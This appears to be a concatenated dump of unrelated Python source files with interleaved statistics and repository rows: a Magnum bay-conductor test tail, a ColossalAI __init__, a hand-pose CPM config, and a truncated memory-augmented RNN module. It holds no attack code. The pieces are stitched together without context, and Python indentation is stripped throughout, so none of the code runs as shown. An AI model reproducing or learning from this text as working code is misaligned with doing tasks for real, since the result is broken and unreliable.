'number_of_minions': 1,
'number_of_masters': 1,
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'discovery_url': 'https://discovery.etcd.io/test',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
self.assertEqual(expected, definition)
@patch('requests.get')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_coreos_no_discoveryurl(
self,
mock_objects_baymodel_get_by_uuid,
reqget):
self.baymodel_dict['cluster_distro'] = 'coreos'
self.bay_dict['discovery_url'] = None
mock_req = mock.MagicMock(text='http://tokentest/h1/h2/h3')
reqget.return_value = mock_req
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'minion_flavor': 'flavor_id',
'master_flavor': 'master_flavor_id',
'number_of_minions': 1,
'number_of_masters': 1,
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'discovery_url': 'http://tokentest/h1/h2/h3',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
self.assertEqual(expected, definition)
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_dns(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='dns_nameserver')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_server_image(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='image_id')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_minion_flavor(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='flavor_id')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_docker_volume_size(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='docker_volume_size')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_master_flavor(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='master_flavor_id')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_apiserver_port(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='apiserver_port')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_node_count(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='node_count')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_master_count(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='master_count')
@patch('requests.get')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_discovery_url(
self,
mock_objects_baymodel_get_by_uuid,
reqget):
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay_dict = self.bay_dict
bay_dict['discovery_url'] = None
bay = objects.Bay(self.context, **bay_dict)
cfg.CONF.set_override('etcd_discovery_service_endpoint_format',
'http://etcd/test?size=%(size)d',
group='bay')
mock_req = mock.MagicMock(text='https://address/token')
reqget.return_value = mock_req
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'master_flavor': 'master_flavor_id',
'minion_flavor': 'flavor_id',
'number_of_minions': 1,
'number_of_masters': 1,
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'docker_volume_size': 20,
'discovery_url': 'https://address/token',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'tenant_name': 'fake_tenant',
'username': 'fake_user',
'bay_uuid': self.bay_dict['uuid'],
'magnum_url': self.mock_osc.magnum_url.return_value,
'region_name': self.mock_osc.cinder_region_name.return_value,
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
self.assertEqual(expected, definition)
reqget.assert_called_once_with('http://etcd/test?size=1')
@patch('magnum.common.short_id.generate_id')
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_create_stack(self,
mock_extract_template_definition,
mock_get_template_contents,
mock_generate_id):
mock_generate_id.return_value = 'xx-xx-xx-xx'
expected_stack_name = 'expected_stack_name-xx-xx-xx-xx'
expected_template_contents = 'template_contents'
dummy_bay_name = 'expected_stack_name'
expected_timeout = 15
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.name = dummy_bay_name
bay_conductor._create_stack(self.context, mock_osc,
mock_bay, expected_timeout)
expected_args = {
'stack_name': expected_stack_name,
'parameters': {},
'template': expected_template_contents,
'files': {},
'timeout_mins': expected_timeout
}
mock_heat_client.stacks.create.assert_called_once_with(**expected_args)
@patch('magnum.common.short_id.generate_id')
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_create_stack_no_timeout_specified(
self,
mock_extract_template_definition,
mock_get_template_contents,
mock_generate_id):
mock_generate_id.return_value = 'xx-xx-xx-xx'
expected_stack_name = 'expected_stack_name-xx-xx-xx-xx'
expected_template_contents = 'template_contents'
dummy_bay_name = 'expected_stack_name'
expected_timeout = cfg.CONF.bay_heat.bay_create_timeout
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.name = dummy_bay_name
bay_conductor._create_stack(self.context, mock_osc,
mock_bay, None)
expected_args = {
'stack_name': expected_stack_name,
'parameters': {},
'template': expected_template_contents,
'files': {},
'timeout_mins': expected_timeout
}
mock_heat_client.stacks.create.assert_called_once_with(**expected_args)
@patch('magnum.common.short_id.generate_id')
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_create_stack_timeout_is_zero(
self,
mock_extract_template_definition,
mock_get_template_contents,
mock_generate_id):
mock_generate_id.return_value = 'xx-xx-xx-xx'
expected_stack_name = 'expected_stack_name-xx-xx-xx-xx'
expected_template_contents = 'template_contents'
dummy_bay_name = 'expected_stack_name'
bay_timeout = 0
expected_timeout = None
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.name = dummy_bay_name
bay_conductor._create_stack(self.context, mock_osc,
mock_bay, bay_timeout)
expected_args = {
'stack_name': expected_stack_name,
'parameters': {},
'template': expected_template_contents,
'files': {},
'timeout_mins': expected_timeout
}
mock_heat_client.stacks.create.assert_called_once_with(**expected_args)
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_update_stack(self,
mock_extract_template_definition,
mock_get_template_contents):
mock_stack_id = 'xx-xx-xx-xx'
expected_template_contents = 'template_contents'
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.stack_id = mock_stack_id
bay_conductor._update_stack({}, mock_osc, mock_bay)
expected_args = {
'parameters': {},
'template': expected_template_contents,
'files': {}
}
mock_heat_client.stacks.update.assert_called_once_with(mock_stack_id,
**expected_args)
| 42.5 | 79 | 0.607083 | 2,639 | 24,565 | 5.234937 | 0.104585 | 0.049946 | 0.05342 | 0.059356 | 0.819399 | 0.786102 | 0.768874 | 0.749403 | 0.730583 | 0.715671 | 0 | 0.036923 | 0.287767 | 24,565 | 577 | 80 | 42.573657 | 0.752686 | 0.02357 | 0 | 0.730469 | 0 | 0 | 0.307567 | 0.093234 | 0 | 0 | 0 | 0 | 0.019531 | 1 | 0.037109 | false | 0.011719 | 0.011719 | 0 | 0.050781 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
422c3676c09d6698c7dd81b2b1c5d3c3b3a0bc50 | 358 | py | Python | colossalai/context/random/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 1,630 | 2021-10-30T01:00:27.000Z | 2022-03-31T23:02:41.000Z | colossalai/context/random/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 166 | 2021-10-30T01:03:01.000Z | 2022-03-31T14:19:07.000Z | colossalai/context/random/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 253 | 2021-10-30T06:10:29.000Z | 2022-03-31T13:30:06.000Z | from ._helper import (seed, set_mode, with_seed, add_seed, get_seeds, get_states, get_current_mode, set_seed_states,
sync_states, moe_set_seed, reset_seeds)
__all__ = [
'seed', 'set_mode', 'with_seed', 'add_seed', 'get_seeds', 'get_states', 'get_current_mode', 'set_seed_states',
'sync_states', 'moe_set_seed', 'reset_seeds'
]
| 44.75 | 116 | 0.698324 | 52 | 358 | 4.211538 | 0.307692 | 0.127854 | 0.100457 | 0.136986 | 0.913242 | 0.913242 | 0.913242 | 0.913242 | 0.913242 | 0.913242 | 0 | 0 | 0.167598 | 358 | 7 | 117 | 51.142857 | 0.734899 | 0 | 0 | 0 | 0 | 0 | 0.315642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
42329cac17be7ce007d2fb380cc16fb22ff9aeea | 9,172 | py | Python | config.py | xiaohanhaowei/cpm | 1d6e1df7b38d28ba71e90a401b07faf882d1319d | [
"Apache-2.0"
] | null | null | null | config.py | xiaohanhaowei/cpm | 1d6e1df7b38d28ba71e90a401b07faf882d1319d | [
"Apache-2.0"
] | 1 | 2020-04-09T05:59:42.000Z | 2020-04-09T05:59:42.000Z | config.py | xiaohanhaowei/cpm | 1d6e1df7b38d28ba71e90a401b07faf882d1319d | [
"Apache-2.0"
] | null | null | null | class FLAGS(object):
""" """
"""
General settings
"""
input_size = 256
heatmap_size = 32
cpm_stages = 3
joint_gaussian_variance = 1.0
center_radius = 21
num_of_joints = 6
color_channel = 'RGB'
normalize_img = True
use_gpu = True
gpu_id = 0
box_size = 256 # kept compatible with `create_cpm_tfr_fulljoints.py`
"""
Demo settings
"""
# 'MULTI': show multiple stage heatmaps
# 'SINGLE': show last stage heatmap
# 'Joint_HM': show last stage heatmap for each joint
# 'image or video path': show detection on single image or video
# DEMO_TYPE = 'test_imgs/139.jpg'
# DEMO_TYPE = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/img3/4424.jpg'
DEMO_TYPE = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/img3/4424.jpg'
# DEMO_TYPE = 'SINGLE'
# model_path = 'cpm_hand'
model_path = 'cpm_hand'
cam_id = 0
webcam_height = 480
webcam_width = 640
KALMAN_ON = False
use_kalman = False
kalman_noise = 0.03
cmap_radius = 21
"""
Training settings
"""
network_def = 'cpm_hand'
# added by hongwei.wang
# train_img_dir and val_img_dir have been moved under ~/WorkSpace/datasets
# there is no need to modify them because we don't train the model on the local machine
# train_img_dir = '/home/wanghongwei/WorkSpace/detect/cpm-tf/dataset/train/fas_train_dataset.tfrecords'
# val_img_dir = '/home/wanghongwei/WorkSpace/detect/cpm-tf/dataset/eval/fas_eval_dataset.tfrecords'
train_img_dir = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/tfrecords-from-cpm/train/fas_train_dataset.tfrecords'
val_img_dir = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/tfrecords-from-cpm/eval/fas_eval_dataset.tfrecords'
bg_img_dir = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/tfrecords-from-cpm/bg/fas_bg_dataset.tfrecords'
# pretrained_model = '/home/wanghongwei/WorkSpace/detect/cpm-tf/models/weights/cpm_hand/input_256_output_32/joints_6/stages_3/init_0.001_rate_0.5_step_10000'
pretrained_model = '/home/wanghongwei/WorkSpace/source/detect/cpm-tf/models/weights/cpm_hand/34-test'
# pretrained_model_file = '/home/wanghongwei/WorkSpace/source/detect/cpm-tf/models/weights/cpm_hand/finetune-0119/init_0.05_rate_0.7_step_10000-300000'
# pretrained_model_file = '/home/wanghongwei/WorkSpace/source/detect/cpm-tf/models/weights/cpm_hand/finetune-0120/init_0.07_rate_0.5_step_15000-200000'
pretrained_model_file = '/home/wanghongwei/WorkSpace/weights/cpm/finetune-0305/init_0.071_rate_0.5_step_20000-300000'
batch_size = 1
init_lr = 0.001
lr_decay_rate = 0.5
lr_decay_step = 10000
training_iters = 100000
verbose_iters = 10
validation_iters = 1000
model_save_iters = 500
augmentation_config = {'hue_shift_limit': (-5, 5),
'sat_shift_limit': (-10, 10),
'val_shift_limit': (-15, 15),
'translation_limit': (-0.15, 0.15),
'scale_limit': (-0.3, 0.5),
'rotate_limit': (-90, 90)}
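The augmentation limits above are (low, high) ranges. A hypothetical sampler (not part of this repo) might consume such a dict by drawing one uniform value per range:

```python
import random

# Hypothetical sampler: one uniform draw per (low, high) pair in a
# config dict shaped like augmentation_config above.
def sample_augmentation(config, rng):
    return {key: rng.uniform(lo, hi) for key, (lo, hi) in config.items()}

cfg = {'rotate_limit': (-90, 90), 'scale_limit': (-0.3, 0.5)}
params = sample_augmentation(cfg, random.Random(0))
# every sampled value stays inside its declared limits
```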
hnm = True # Make sure to generate HNM files first
do_cropping = True
"""
For Freeze graphs
"""
output_node_names = 'stage_3/mid_conv7/BiasAdd:0'
"""
For Drawing
"""
# Default Pose
default_hand = [[259, 335],
[245, 311],
[226, 288],
[206, 270],
[195, 261],
[203, 308],
[165, 290],
[139, 287],
[119, 284],
[199, 328],
[156, 318],
[128, 314],
[104, 318],
[204, 341],
[163, 340],
[133, 347],
[108, 349],
[206, 359],
[176, 368],
[164, 370],
[144, 377]]
# Limb connections
# center-> little finger
# center -> ring finger
# center -> middle finger
# center -> forefinger
# center -> thumb
limbs = [[0, 1],
[1, 2],
[2, 3],
[3, 4], # which limb connection
[0, 5]
# [5, 6],
# [6, 7],
# [7, 8], # limb connection
# [0, 9],
# [9, 10],
# [10, 11],
# [11, 12], # limb connection
# [0, 13],
# [13, 14],
# [14, 15],
# [15, 16], # limb connection
# [0, 17],
# [17, 18],
# [18, 19],
# [19, 20] # limb connection
]
# Finger colors
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# My hand joint order
# FLAGS.limbs = [[0, 1],
# [1, 2],
# [2, 3],
# [3, 20],
# [4, 5],
# [5, 6],
# [6, 7],
# [7, 20],
# [8, 9],
# [9, 10],
# [10, 11],
# [11, 20],
# [12, 13],
# [13, 14],
# [14, 15],
# [15, 20],
# [16, 17],
# [17, 18],
# [18, 19],
# [19, 20]
# ]
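How a drawing routine might combine `default_hand` and `limbs` above: each limb pair indexes two joints, yielding a line segment. This is an illustrative sketch (a real renderer would then pass each segment to e.g. cv2.line), using only the five active limbs:

```python
# Pair joint coordinates with limb index pairs to get line segments.
joints = [[259, 335], [245, 311], [226, 288], [206, 270],
          [195, 261], [203, 308]]
limbs = [[0, 1], [1, 2], [2, 3], [3, 4], [0, 5]]

segments = [(tuple(joints[a]), tuple(joints[b])) for a, b in limbs]
# segments[0] connects joint 0 to joint 1
```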
class PIN_FLAGS(object):
""" """
"""
General settings
"""
input_size = 256
heatmap_size = 32
cpm_stages = 3
joint_gaussian_variance = 1.0
center_radius = 21
num_of_joints = 6
color_channel = 'RGB'
normalize_img = True
use_gpu = True
gpu_id = 0
"""
Demo settings
"""
# 'MULTI': show multiple stage heatmaps
# 'SINGLE': show last stage heatmap
# 'Joint_HM': show last stage heatmap for each joint
# 'image or video path': show detection on single image or video
DEMO_TYPE = 'MULTI'
model_path = 'cpm_hand'
cam_id = 0
webcam_height = 480
webcam_width = 640
KALMAN_ON = False
use_kalman = True
kalman_noise = 0.03
"""
Training settings
"""
network_def = 'cpm_hand'
train_img_dir = ''
val_img_dir = ''
bg_img_dir = ''
pretrained_model = 'cpm_hand'
batch_size = 5
init_lr = 0.001
lr_decay_rate = 0.5
lr_decay_step = 10000
training_iters = 300000
verbose_iters = 10
validation_iters = 1000
model_save_iters = 5000
augmentation_config = {'hue_shift_limit': (-5, 5),
'sat_shift_limit': (-10, 10),
'val_shift_limit': (-15, 15),
'translation_limit': (-0.15, 0.15),
'scale_limit': (-0.3, 0.5),
'rotate_limit': (-90, 90)}
hnm = True # Make sure to generate HNM files first
do_cropping = True
"""
For Freeze graphs
"""
output_node_names = 'stage_3/mid_conv7/BiasAdd:0'
"""
For Drawing
"""
# Default Pose
default_hand = [[259, 335],
[245, 311],
[226, 288],
[206, 270],
[195, 261],
[203, 308],
[165, 290],
[139, 287],
[119, 284],
[199, 328],
[156, 318],
[128, 314],
[104, 318],
[204, 341],
[163, 340],
[133, 347],
[108, 349],
[206, 359],
[176, 368],
[164, 370],
[144, 377]]
# Limb connections
limbs = [[0, 1],
[1, 2],
[2, 3],
[3, 4],
[0, 5],
[5, 6],
[6, 7],
[7, 8],
[0, 9],
[9, 10],
[10, 11],
[11, 12],
[0, 13],
[13, 14],
[14, 15],
[15, 16],
[0, 17],
[17, 18],
[18, 19],
[19, 20]
]
# Finger colors
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# My hand joint order
# FLAGS.limbs = [[0, 1],
# [1, 2],
# [2, 3],
# [3, 20],
# [4, 5],
# [5, 6],
# [6, 7],
# [7, 20],
# [8, 9],
# [9, 10],
# [10, 11],
# [11, 20],
# [12, 13],
# [13, 14],
# [14, 15],
# [15, 20],
# [16, 17],
# [17, 18],
# [18, 19],
# [19, 20]
# ]
| 29.303514 | 161 | 0.450611 | 1,007 | 9,172 | 3.91857 | 0.265144 | 0.045616 | 0.072985 | 0.040547 | 0.812468 | 0.791181 | 0.754942 | 0.747086 | 0.721237 | 0.6741 | 0 | 0.156767 | 0.419974 | 9,172 | 312 | 162 | 29.397436 | 0.584962 | 0.296337 | 0 | 0.746988 | 0 | 0.03012 | 0.134427 | 0.097795 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.487952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
427f4cf06609600ffc73e962e424aa63d6499c54 | 17,510 | py | Python | algorithimic_tasks/marnn.py | zoharli/armin | 9bf8e4533850a66bbef26390244f0d0ad30c067b | [
"MIT"
] | 3 | 2019-07-01T12:11:29.000Z | 2020-05-25T22:37:50.000Z | algorithimic_tasks/marnn.py | zoharli/armin | 9bf8e4533850a66bbef26390244f0d0ad30c067b | [
"MIT"
] | null | null | null | algorithimic_tasks/marnn.py | zoharli/armin | 9bf8e4533850a66bbef26390244f0d0ad30c067b | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
import random
import helper
class LSTMCell(nn.Module):
def __init__(self,config,input_size,num_units, use_ln,use_zoneout, f_bias = 1.):
super().__init__()
self.input_size=input_size
self.num_units = num_units
self.f_bias = f_bias
self.use_ln=use_ln
self.use_zoneout = use_zoneout
x_size=input_size
h_size=num_units
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+h_size, 4 * h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([4*h_size]))
def forward(self, x ):
h, c = self.recurrent_state
h_size = self.num_units
x_size = self.input_size
concat = torch.cat((x,h), dim= 1)
concat = torch.mm(concat,self.W_full) + self.bias
i,j,f,o = torch.split(concat,h_size, dim=1)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * torch.tanh(j)
new_h = torch.tanh(new_c) * torch.sigmoid(o)
self.recurrent_state=(new_h,new_c)
return new_h
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])
c = torch.zeros([batch_size, self.num_units])
self.recurrent_state=(h, c)
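Note that this LSTMCell keeps its (h, c) pair on `self.recurrent_state` instead of threading state through `forward()`. A minimal pure-Python stand-in (a hypothetical `StatefulCell`, no torch required) sketches that pattern:

```python
# Minimal stand-in for the stateful-cell pattern used by LSTMCell above:
# zero_state() seeds the recurrent state, forward() reads and rewrites it.
class StatefulCell:
    def zero_state(self, batch_size):
        self.recurrent_state = [0.0] * batch_size

    def forward(self, x):
        h = self.recurrent_state
        new_h = [hi + x for hi in h]   # toy update in place of the LSTM math
        self.recurrent_state = new_h
        return new_h

cell = StatefulCell()
cell.zero_state(2)
for step in (1.0, 2.0, 3.0):
    out = cell.forward(step)
# state accumulates across the loop
```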
class MARNN(nn.Module):
def __init__(self,config,input_size,num_units,output_size, use_zoneout=True,
use_ln=True):
super().__init__()
if config.model=='armin':
self.cell=ARMIN(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
elif config.model=='tardis':
self.cell=TARDIS(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
elif config.model=='awta':
self.cell=ARMIN_with_TARDIS_addr(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
elif config.model=='lstm':
self.cell=LSTMCell(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
if config.model=='lstm':
self.fc=nn.Linear(num_units,output_size)
else:
self.fc=nn.Linear(config.r_size+num_units,output_size)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
def forward(self,x):
return torch.sigmoid(self.fc(self.cell(x)))
def reset(self,batch_size=1):
self.cell.zero_state(batch_size)
if hasattr(self.cell,'_reset_mem'):
self.cell._reset_mem(batch_size)
class ARMIN(nn.Module):
def __init__(self,config,input_size,num_units, use_zoneout=True,
use_ln=True,indrop=True,outdrop=True, f_bias = 1.):
super().__init__()
self.input_size=input_size
self.num_units = num_units
self.f_bias = f_bias
self.use_zoneout = use_zoneout
self.use_ln=use_ln
x_size=input_size
h_size=num_units
self.r_size=r_size=config.r_size
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+4* h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([r_size+4*h_size]))
self.W_full1 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+h_size] , scale = 1.0))
self.bias1 = nn.Parameter(torch.zeros([r_size+h_size]))
self.trans=nn.Linear(x_size+h_size,r_size)
torch.nn.init.orthogonal_(self.trans.weight)
torch.nn.init.constant_(self.trans.bias,0)
self.c_bias=nn.Parameter(torch.rand(1,num_units))
self.hmem_bias=nn.Parameter(torch.zeros(1,config.mem_cap,r_size))
self.memcnt=0
self.mem_cap=config.mem_cap
self.tau=1.
self.fc=nn.Linear(x_size+h_size,config.mem_cap)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
def forward(self, x0):
h,c= self.recurrent_state
x=x0
h_size = self.num_units
x_size = self.input_size
h_read_head=torch.cat([x,c],dim=1)
h_read_head=self.fc(h_read_head)
h_entry,h_read_index=self.read(h_read_head,self.tau)
new_c=torch.cat([c,h_entry],dim=1)
concat = torch.cat((x,new_c), dim= 1)
concat1=torch.mm(concat,self.W_full1) +self.bias1
concat1=torch.sigmoid(concat1)
concat1=torch.cat([torch.ones_like(x),concat1],dim=1)
concat = concat*concat1
concat = torch.mm(concat,self.W_full) + self.bias
i,j,f,o,om = torch.split(concat,h_size, dim=1)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * torch.tanh(j)
new_c=torch.tanh(new_c)
new_h = new_c * torch.sigmoid(o)
r = h_entry * torch.sigmoid(om)
if self.memcnt<self.mem_cap:
h_write_index=torch.cat([torch.zeros(self.memcnt),torch.ones(1),torch.zeros(self.mem_cap-1-self.memcnt)]).unsqueeze(0)
self.memcnt+=1
else:
h_write_index=h_read_index.detach()
self.write(self.trans(torch.cat([x,new_c],dim=1)),h_write_index)
self.recurrent_state=(new_h,new_c)
new_r=torch.cat([new_h,r],dim=1)
return new_r
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])
c = torch.zeros([batch_size, self.num_units])+torch.tanh(self.c_bias)
self.recurrent_state=(h, c)
def _reset_mem(self,batch_size):
self.memcnt=0
self.hmem=torch.zeros(batch_size,self.mem_cap,self.r_size)+self.hmem_bias
def _reload_mem(self):
self.hmem=self.hmem.detach()
def set_tau(self,num):
self.tau=num
def write(self,h,h_index):
h_ones=h_index.unsqueeze(2)
self.hmem=h.unsqueeze(1)*h_ones+self.hmem*(1.-h_ones)
def read(self,h_read_head,tau):
h_index=torch.nn.functional.softmax(h_read_head,dim=1)
h_entry=h_index.unsqueeze(2)*self.hmem
h_entry=h_entry.sum(dim=1)
return h_entry,h_index
def gumbel_softmax(self,input, tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.nn.functional.softmax((input+gumbel)*tau,dim=1)
ymax,pos=y.max(dim=1)
hard_y=torch.eq(y,ymax.unsqueeze(1)).float()
y=(hard_y-y).detach()+y
return y,pos
def _reset_inf_mem(self):
self.memcnt=0
self.hmem=[]
for _ in range(self.mem_cap):
self.hmem.append(torch.zeros(1,self.num_units).cuda())
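The `gumbel_softmax` method above relies on the Gumbel-max trick: adding Gumbel noise to logits and taking the argmax samples from the softmax distribution of those logits. A pure-Python numerical sketch (stand-in for the torch version, straight-through estimator omitted):

```python
import math, random

# Gumbel-max sampling: argmax of (logit + Gumbel noise) is a sample
# from softmax(logits).
def gumbel_argmax(logits, rng):
    noisy = [l - math.log(-math.log(rng.random() + 1e-20) + 1e-20)
             for l in logits]
    return max(range(len(noisy)), key=noisy.__getitem__)

rng = random.Random(0)
logits = [2.0, 0.0, 0.0]
counts = [0, 0, 0]
for _ in range(5000):
    counts[gumbel_argmax(logits, rng)] += 1
# the index with the largest logit should dominate the counts
```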
class TARDIS(nn.Module):
def __init__(self,config,input_size,num_units, use_zoneout=True,
use_ln=True,indrop=True,outdrop=True, f_bias = 1.):
super().__init__()
self.input_size = input_size
